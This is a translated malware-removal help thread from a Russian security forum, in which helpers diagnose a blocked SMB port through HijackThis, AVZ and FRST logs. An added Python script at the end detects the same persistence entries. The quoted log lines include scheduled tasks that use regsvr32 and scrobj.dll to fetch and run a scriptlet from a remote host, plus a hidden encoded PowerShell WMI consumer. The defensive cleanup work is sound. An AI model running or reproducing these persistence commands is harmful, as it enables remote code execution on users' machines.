Cannot connect to port 445 from my own computer. I'm not sure whether it's a virus or something else; the problem is that I can telnet localhost 445, but I cannot telnet my-ip 445. Maybe something malicious is blocking it.
Dear [B]алдар[/B], thank you for contacting our forum!
Virus removal is a completely free service at VirusInfo.Info. Helpers will respond to your request very shortly. To receive help, you need to provide scan logs produced by the Autologger utility; for details, see the [URL="https://virusinfo.info/pravila.html"]rules for submitting a help request[/URL].
Hello,
HiJackThis (from the [B]autologger[/B] folder): [URL=http://virusinfo.info/showthread.php?t=4491&p=64376&viewfull=1#post64376]fix[/URL] these entries:
[CODE]
O7 - IPSec: Name: netbc (2018/09/05) - {6b0c5cb1-0da6-405d-9db6-9ff3ddac2791} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: System Log Security Check - C:\Windows\system32\regsvr32.exe /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll
O22 - Task: WindowsLogTasks - C:\Windows\system32\regsvr32.exe /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll
O25 - WMI Event: [Windows Events Consumer] Windows Events Filter - Event="__InstanceModificationEvent WITHIN 5600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", powershell.exe -NoP -NonI -W Hidden -E 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
[/CODE]
AVZ: [URL=http://virusinfo.info/showthread.php?t=7239&p=88804&viewfull=1#post88804]run the following script[/URL].
Important: on Windows Vista/7/8/8.1, launch AVZ from the Explorer context menu as Administrator.
[CODE]
begin
 // Set Internet Explorer security options for the Internet zone (Zones\3)
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
 // Reboot the computer
 RebootWindows(false);
end.
[/CODE]
After the script runs, the computer will reboot.
- Prepare an [URL="https://virusinfo.info/showthread.php?t=218752&p=1480546&viewfull=1#post1480546"]AdwCleaner[/URL] log and attach it to the thread.
[COLOR="silver"]- - - - -Added - - - - -[/COLOR]
New malware found:
[CODE]Trojan-Downloader.PowerShell.Agent.fy[/CODE]
Right after the HijackThis fix, port 445 became accessible.
I ran the AVZ script and am attaching the AdwCleaner log.
Change all your passwords and proceed to the next instructions.
- Download [url=http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/][b]Farbar Recovery Scan Tool[/b][/url] [img]http://i.imgur.com/NAAC5Ba.png[/img] and save it to the Desktop.
[b]Note[/b]: you need to choose the version compatible with your operating system. If you are not sure which version suits your system, download both and try running them. Only one of them will run on your system.
[list][*]Launch the program by double-clicking it. When the program starts, click [b]Yes[/b] to accept the warning.[*]Make sure that [i]"List BCD"[/i] and [i]"Driver MD5"[/i] are checked in the [b]Optional Scan[/b] box.
[img]http://i.imgur.com/B92LqRQ.png[/img][*]Click the [b]Scan[/b] button.[*]When the scan finishes, a report ([b]FRST.txt[/b]) will be created in the same folder the program was run from. Please attach the report in your next post.[*]If the program was run for the first time, a report ([b]Addition.txt[/b]) will also be created. Please attach it in your next post.[/list]
Farbar won't start; it shows errors saying that it cannot create registry keys.
[ATTACH=CONFIG]673891[/ATTACH]
Just in case, I made the logs again with autologger.
Try collecting the log in Safe Mode.
It doesn't work in Safe Mode either. The same errors pop up.
Despite the errors popping up, the program does start. I'm attaching the logs.
Did you set the restrictions in Group Policy yourself?
[CODE]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
[/CODE]
[LIST][*] Copy the text below into Notepad and save the file as [b]fixlist.txt[/b] with [B]Unicode[/B] encoding in the same folder from which Farbar Recovery Scan Tool was run:
[CODE]
CreateRestorePoint:
CloseProcesses:
File: C:\Windows\System32\DRIVERS\smbdirect.sys
File: C:\Windows\System32\drivers\rt640x64.sys
Folder: C:\Windows\pss
Folder: C:\Users\Administrator\AppData\Local\DBG
File: C:\Windows\SysWOW64\pcimsg.dll
Reboot:
[/CODE][*] Run FRST, click the [b]Fix[/b] button once, and wait. [*] The program will create a log file [b](Fixlog.txt)[/b]. Please attach it in your next post![*]Note that the computer will be [b]rebooted[/b].[/LIST]
[QUOTE=SQ;1488758]Did you set the restrictions in Group Policy yourself?
[/QUOTE]
As for Windows Defender, I haven't done anything with it. Maybe Kaspersky blocks it automatically?
Updates for Firefox are disabled through Group Policy.
I'm attaching the fixlog:
What is the status of the problem?
The problem was solved right after I applied the HijackThis fix.
To finish up:
1.
[list][*]Please run adwcleaner.exe[*]In the [B]Settings[/B] menu - [B]Uninstall AdwCleaner[/B] - choose [B]Uninstall[/B].[*]Confirm the removal by clicking: Yes.[/list]
Rename FRST.exe (or FRST64.exe) to [B]uninstall.exe[/B] and run it.
The computer will reboot.
The remaining cleanup utilities and folders can simply be deleted.
Good luck.
Thank you very much
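The three kinds of HijackThis entries fixed in this thread (an IPSec rule blocking port 445, scheduled tasks that run regsvr32 with a URL and scrobj.dll, and a WMI event consumer launching hidden PowerShell with an encoded command) can be picked out of a log automatically. The following is an added example, not part of the original thread or of any tool mentioned in it; the rule names, the `triage` function and the regular expressions are hypothetical and assume log lines shaped like the ones quoted above, and the sample log is constructed with placeholder values.

```python
import re

# Each rule: (name, HijackThis section, pattern applied to the text after "Oxx - ").
RULES = [
    # IPSec policy that blocks inbound SMB: explains "localhost works, own IP does not".
    ("ipsec-blocks-smb", "O7",
     re.compile(r"IPSec:.*\(Port 445 TCP\).*Action:\s*Block", re.I)),
    # Scheduled task using regsvr32 to load a scriptlet from a URL via scrobj.dll.
    ("task-regsvr32-remote-scriptlet", "O22",
     re.compile(r"regsvr32(\.exe)?\b.*?/i:https?://\S+.*\bscrobj\.dll", re.I)),
    # WMI event consumer starting PowerShell hidden with an encoded command.
    ("wmi-hidden-encoded-powershell", "O25",
     re.compile(r"WMI Event:.*powershell(\.exe)?\b"
                r"(?=.*\s-w[a-z]*\s+hidden\b)"
                r"(?=.*\s-e(n(c(odedcommand)?)?)?\s+\S)", re.I)),
]
ENTRY = re.compile(r"^(O\d+)\s+-\s+(.*)$")


def triage(log_lines):
    """Return a list of (section, rule_name, line) for every matching entry."""
    findings = []
    for raw in log_lines:
        line = raw.strip()
        m = ENTRY.match(line)
        if not m:
            continue
        section, body = m.groups()
        for name, wanted, pattern in RULES:
            if section == wanted and pattern.search(body):
                findings.append((section, name, line))
    return findings


# Constructed sample log (placeholder names, host and payload), not the user's log.
SAMPLE_LOG = [
    r"O4 - HKLM\..\Run: [Example] C:\Program Files\Example\example.exe",
    "O7 - IPSec: Name: example (2018/09/05) - {00000000-0000-0000-0000-000000000000} "
    "- Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block",
    r"O22 - Task: Example Helper - C:\Windows\system32\regsvr32.exe /s C:\Example\helper.dll",
    r"O22 - Task: Example Check - C:\Windows\system32\regsvr32.exe /u /s "
    r"/i:http://example.invalid/a.php scrobj.dll",
    "O25 - WMI Event: [Example Consumer] Example Filter - Event=\"...\", "
    "powershell.exe -NoP -NonI -W Hidden -E PLACEHOLDER",
]

if __name__ == "__main__":
    for section, rule, line in triage(SAMPLE_LOG):
        print(f"{section}  {rule}\n    {line}")
```

A match is only a prompt for review: a legitimate administrator can also create an IPSec block rule, so each finding still has to be confirmed against what was deliberately configured on the machine.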